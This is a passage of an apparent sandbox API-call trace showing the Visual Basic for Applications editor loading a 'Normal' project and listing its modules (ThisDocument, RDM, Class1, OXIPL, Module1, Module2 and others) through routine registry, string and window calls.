(in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.790] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f88 | out: phkResult=0x2e5f88*=0xa60) returned 0x0 [0031.790] lstrcpyA (in: lpString1=0x2e5df0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.790] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.790] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.790] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f88 | out: phkResult=0x2e5f88*=0xa60) returned 0x0 [0031.791] lstrcpyA (in: lpString1=0x2e5df0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.791] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.791] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.791] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f88 | out: phkResult=0x2e5f88*=0xa60) returned 0x0 [0031.792] GetDC (hWnd=0x0) returned 0x30108d1 [0031.792] GetDeviceCaps (hdc=0x30108d1, index=88) returned 96 [0031.792] DeleteDC (hdc=0x30108d1) returned 1 [0031.792] GetDC (hWnd=0x0) returned 0x30108d1 [0031.792] GetDeviceCaps (hdc=0x30108d1, index=88) returned 96 [0031.792] DeleteDC (hdc=0x30108d1) returned 1 [0031.792] GetDC (hWnd=0x0) returned 0x30108d1 [0031.792] GetDeviceCaps (hdc=0x30108d1, index=90) returned 96 [0031.792] DeleteDC (hdc=0x30108d1) returned 1 [0031.795] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x81, wParam=0x0, lParam=0x2e58f0) returned 0x1 [0031.795] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x83, wParam=0x0, lParam=0x2e5940) returned 0x0 [0031.797] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x55, wParam=0x1022a, lParam=0x3) returned 0x1 [0031.797] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0031.799] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x210, wParam=0x10001, lParam=0x1022a) returned 0x0 [0031.799] GetSystemDefaultLangID () returned 0x490409 [0031.799] CreateFontIndirectA (lplf=0x2e5430) returned 0x20a0952 [0031.799] CreateFontIndirectA (lplf=0x2e5430) returned 0x30a0953 [0031.801] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x1, wParam=0x0, lParam=0x2e58f0) returned 0x0 [0031.801] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x5, wParam=0x0, lParam=0x640064) returned 0x0 [0031.801] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0031.801] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x210, wParam=0x1, lParam=0x10228) returned 0x0 [0031.801] lstrcpyA (in: lpString1=0x2e5df0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.801] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.801] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.801] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f88 | out: phkResult=0x2e5f88*=0xa60) returned 0x0 [0031.801] LoadStringA (in: hInstance=0x7fef1850000, uID=0x3346, lpBuffer=0x2e3ba0, cchBufferMax=512 | out: lpBuffer="Project") returned 0x7 [0031.801] LoadStringA (in: hInstance=0x7fef1850000, uID=0x3347, lpBuffer=0x2e3ba0, cchBufferMax=512 | out: lpBuffer="No Open Projects") returned 0x10 [0031.802] strcpy_s (in: _Dst=0x2e5e00, _DstSize=0x208, _Src="No Open Projects" | out: _Dst="No Open Projects") returned 0x0 [0031.802] lstrcpyA (in: lpString1=0x2e5bf0, lpString2="Project" | out: lpString1="Project") returned="Project" [0031.802] lstrcatA (in: lpString1="Project", lpString2=" - " | out: lpString1="Project - ") returned="Project - " [0031.802] lstrcatA (in: lpString1="Project - ", lpString2="No Open Projects" | out: lpString1="Project - No Open Projects") returned="Project - No Open Projects" [0031.802] SetWindowTextA (hWnd=0x10228, lpString="Project - No Open Projects") returned 1 [0031.802] IsWindowVisible (hWnd=0x10228) returned 0 [0031.802] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0xc, wParam=0x0, lParam=0x2e5bf0) returned 0x1 [0031.802] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d3e0 [0031.802] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d3e0 [0031.802] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x46, wParam=0x0, lParam=0x2e5530) returned 0x0 [0031.802] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x83, wParam=0x1, lParam=0x2e5500) returned 0x0 [0031.802] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x47, wParam=0x0, lParam=0x2e5530) returned 0x0 [0031.817] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0031.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0031.817] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0031.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=8, lpWideCharStr=0x7667f28, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0031.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x2e5b70, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0031.818] lstrlenA (lpString="Project") returned 7 [0031.818] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5aa0) returned 0x1 [0031.823] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d3e0) returned 0x0 [0031.823] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x0) returned 0x1 [0031.823] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.823] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0031.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0031.823] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0031.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=8, lpWideCharStr=0x7667f28, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0031.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x2e5920, cbMultiByte=520, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0031.823] lstrlenA (lpString="Project") returned 7 [0031.823] lstrcpyA (in: lpString1=0x2e5710, lpString2="Project" | out: lpString1="Project") returned="Project" [0031.823] lstrcatA (in: lpString1="Project", lpString2=" - " | out: lpString1="Project - ") returned="Project - " [0031.823] lstrcatA (in: lpString1="Project - ", lpString2="Project" | out: lpString1="Project - Project") returned="Project - Project" [0031.823] SysStringByteLen (bstr="潎浲污") returned 0x6 [0031.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0031.823] SysStringByteLen (bstr="潎浲污") returned 0x6 [0031.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=7, lpWideCharStr=0x7667f28, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0031.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x2e5510, cbMultiByte=520, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0031.823] lstrlenA (lpString="Normal") returned 6 [0031.824] LoadStringA (in: hInstance=0x7fef1850000, uID=0x3354, lpBuffer=0x2e34c0, cchBufferMax=512 | out: lpBuffer="running") returned 0x7 [0031.824] strcpy_s (in: _Dst=0x2e5720, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0031.824] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0031.824] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0031.824] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal", _SizeInBytes=0x410, _Source=" [" | out: _Destination="Microsoft Visual Basic for Applications - Normal [") returned 0x0 [0031.824] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal [", _SizeInBytes=0x410, _Source="running" | out: _Destination="Microsoft Visual Basic for Applications - Normal [running") returned 0x0 [0031.824] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal [running", _SizeInBytes=0x410, _Source="]" | out: _Destination="Microsoft Visual Basic for Applications - Normal [running]") returned 0x0 [0031.824] SetWindowTextA (hWnd=0x10222, lpString="Microsoft Visual Basic for Applications - Normal [running]") returned 1 [0031.824] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0xc, wParam=0x0, lParam=0x2e5720) returned 0x0 [0031.824] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d3e0) returned 0x0 [0031.824] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x0) returned 0x780d3e0 [0031.824] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5ad0) returned 0x1 [0031.824] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780d3e0) returned 0x0 [0031.824] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5a50) returned 0x780ed00 [0031.824] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5a50) returned 0x780ed00 [0031.824] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5940) returned 0x1 [0031.833] GetObjectA (in: h=0x5050954, c=32, pv=0x2e5c50 | out: pv=0x2e5c50) returned 32 [0031.833] GetDC (hWnd=0x0) returned 0x30108d1 [0031.833] GetDeviceCaps (hdc=0x30108d1, index=90) returned 96 [0031.833] DeleteDC (hdc=0x30108d1) returned 1 [0031.833] GetDC (hWnd=0x0) returned 0x30108d1 [0031.833] GetDeviceCaps (hdc=0x30108d1, index=88) returned 96 [0031.833] DeleteDC (hdc=0x30108d1) returned 1 [0031.833] ImageList_AddMasked (himl=0xb545000, hbmImage=0x5050954, crMask=0xff00ff) returned 20 [0031.833] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d380 [0031.833] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d380 [0031.833] lstrlenA (lpString="ThisDocument") returned 12 [0031.833] lstrlenA (lpString="ThisDocument") returned 12 [0031.833] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5aa0) returned 0x1 [0031.833] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d380) returned 0x780ed00 [0031.833] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x780ed00) returned 0x1 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.834] SendMessageA (hWnd=0x10224, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10226 [0031.834] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5a50) returned 0x780d320 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5a50) returned 0x780d320 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5960) returned 0x1 [0031.834] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d2c0 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d2c0 [0031.834] lstrlenA (lpString="RDM") returned 3 [0031.834] lstrlenA (lpString="RDM") returned 3 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5aa0) returned 0x1 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d2c0) returned 0x780d320 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x780d320) returned 0x1 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.834] SendMessageA (hWnd=0x10224, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10226 [0031.834] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5a50) returned 0x780d260 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5a50) returned 0x780d260 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5960) returned 0x1 [0031.834] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d200 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d200 [0031.834] lstrlenA (lpString="Rape") returned 4 [0031.834] lstrlenA (lpString="Rape") returned 4 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5aa0) returned 0x1 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d200) returned 0x780d260 [0031.834] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x780d260) returned 0x1 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.835] SendMessageA (hWnd=0x10224, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10226 [0031.835] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d1a0 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d1a0 [0031.835] lstrlenA (lpString="Class1") returned 6 [0031.835] lstrlenA (lpString="Class1") returned 6 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5aa0) returned 0x1 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d1a0) returned 0x780d260 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x780d260) returned 0x1 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.835] SendMessageA (hWnd=0x10224, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10226 [0031.835] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d140 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d140 [0031.835] lstrlenA (lpString="OXIPL") returned 5 [0031.835] lstrlenA (lpString="OXIPL") returned 5 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5aa0) returned 0x1 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d140) returned 0x780d260 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x780d260) returned 0x1 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.835] SendMessageA (hWnd=0x10224, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10226 [0031.835] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5a50) returned 0x780d0e0 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5a50) returned 0x780d0e0 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5960) returned 0x1 [0031.835] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d080 [0031.835] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d080 [0031.835] lstrlenA (lpString="Module1") returned 7 [0031.836] lstrlenA (lpString="Module1") returned 7 [0031.836] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5aa0) returned 0x1 [0031.836] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d080) returned 0x780d0e0 [0031.836] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x780d0e0) returned 0x1 [0031.836] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.836] SendMessageA (hWnd=0x10224, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10226 [0031.836] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d020 [0031.836] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780d020 [0031.836] lstrlenA (lpString="Module2") returned 7 [0031.836] lstrlenA (lpString="Module2") returned 7 [0031.836] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5aa0) returned 0x1 [0031.836] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d020) returned 0x780d0e0 [0031.836] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x780d0e0) returned 0x1 [0031.836] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.836] SendMessageA (hWnd=0x10224, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10226 [0031.836] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780cfc0 [0031.836] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780cfc0 [0031.837] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x46, wParam=0x0, lParam=0x2e5530) returned 0x0 [0031.837] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x83, wParam=0x1, lParam=0x2e5500) returned 0x0 [0031.837] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x47, wParam=0x0, lParam=0x2e5530) returned 0x0 [0031.837] SysStringByteLen (bstr="潎浲污") returned 0x6 [0031.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0031.838] SysStringByteLen (bstr="潎浲污") returned 0x6 [0031.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=7, lpWideCharStr=0x7667f28, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0031.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x2e5b70, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0031.838] lstrlenA (lpString="Normal") returned 6 [0031.838] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5aa0) returned 0x1 [0031.838] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780cfc0) returned 0x0 [0031.838] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x0) returned 0x1 [0031.838] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.838] SysStringByteLen (bstr="潎浲污") returned 0x6 [0031.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0031.838] SysStringByteLen (bstr="潎浲污") returned 0x6 [0031.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=7, lpWideCharStr=0x7667f28, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0031.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x2e5920, cbMultiByte=520, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0031.838] lstrlenA (lpString="Normal") returned 6 [0031.838] lstrcpyA (in: lpString1=0x2e5710, lpString2="Project" | out: lpString1="Project") returned="Project" [0031.838] lstrcatA (in: lpString1="Project", lpString2=" - " | out: lpString1="Project - ") returned="Project - " [0031.838] lstrcatA (in: lpString1="Project - ", lpString2="Normal" | out: lpString1="Project - Normal") returned="Project - Normal" [0031.838] SetWindowTextA (hWnd=0x10228, lpString="Project - Normal") returned 1 [0031.838] IsWindowVisible (hWnd=0x10228) returned 0 [0031.838] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0xc, wParam=0x0, lParam=0x2e5710) returned 0x1 [0031.838] SysStringByteLen (bstr="潎浲污") returned 0x6 [0031.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0031.838] SysStringByteLen (bstr="潎浲污") returned 0x6 [0031.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7665f48, cbMultiByte=7, lpWideCharStr=0x7667f28, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0031.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x2e5510, cbMultiByte=520, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0031.838] lstrlenA (lpString="Normal") returned 6 [0031.838] strcpy_s (in: _Dst=0x2e5720, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0031.838] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0031.838] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0031.838] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal", _SizeInBytes=0x410, _Source=" [" | out: _Destination="Microsoft Visual Basic for Applications - Normal [") returned 0x0 [0031.838] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal [", _SizeInBytes=0x410, _Source="running" | out: _Destination="Microsoft Visual Basic for Applications - Normal [running") returned 0x0 [0031.838] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - Normal [running", _SizeInBytes=0x410, _Source="]" | out: _Destination="Microsoft Visual Basic for Applications - Normal [running]") returned 0x0 [0031.839] SetWindowTextA (hWnd=0x10222, lpString="Microsoft Visual Basic for Applications - Normal [running]") returned 1 [0031.839] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0xc, wParam=0x0, lParam=0x2e5720) returned 0x0 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d3e0) returned 0x780ed00 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5ad0) returned 0x1 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780ed00) returned 0x780d320 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5ad0) returned 0x1 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780d320) returned 0x780d0e0 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5ad0) returned 0x1 [0031.839] CallWindowProcA 